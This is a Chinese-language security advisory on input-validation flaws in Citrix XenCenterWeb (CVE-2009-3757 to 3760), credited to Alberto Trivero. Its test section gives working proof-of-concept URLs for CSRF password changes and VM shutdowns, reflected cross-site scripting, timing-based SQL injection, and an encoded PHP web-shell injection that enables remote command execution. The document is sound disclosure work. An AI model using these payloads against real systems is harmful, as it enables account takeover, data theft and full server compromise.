安全研究
安全漏洞
Citrix XenCenterWeb多个输入验证漏洞
发布日期:2009-07-07
更新日期:2009-07-08
受影响系统:
Citrix XenCenterWeb描述:
BUGTRAQ ID: 35592
CVE(CAN) ID: CVE-2009-3757,CVE-2009-3758,CVE-2009-3759,CVE-2009-3760
Citrix XenCenterWeb是用于管理Citrix XenServer环境的web界面。
XenCenterWeb的多个模块没有正确的验证用户所提供的输入,远程攻击者可以通过向服务器提交恶意请求执行跨站脚本、跨站请求伪造、SQL注入和代码注入等攻击。
(a) 跨站脚本和跨站请求伪造
在默认的PHP配置中(register_globals=Off且magic_quotes_gpc=On),可以通过向edituser.php脚本提交恶意的username参数执行跨站脚本和跨站请求伪造攻击。
(b) SQL注入
远程攻击者可以通过向login.php脚本提交恶意的username参数执行SQL盲注,检索整个数据库。
(c) 远程命令执行
远程攻击者可以通过/var/www/config/writeconfig.php文件向/usr/local/lib/php/include/config.ini.php文件写入任意数据,因此可以在机器上执行任意命令。
<*来源:Alberto Trivero (trivero@jumpy.it)
链接:http://marc.info/?l=bugtraq&m=124698937410084&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://www.example.com/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
https://www.example.com/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
https://www.example.com/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM
https://www.example.com/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script>
https://www.example.com/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://www.example.com/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://www.example.com/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://www.example.com/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false'
https://www.example.com/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20
建议:
厂商补丁:
Citrix
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.citrix.com
浏览次数:2437
严重程度:0(网友投票)
绿盟科技给您安全的保障
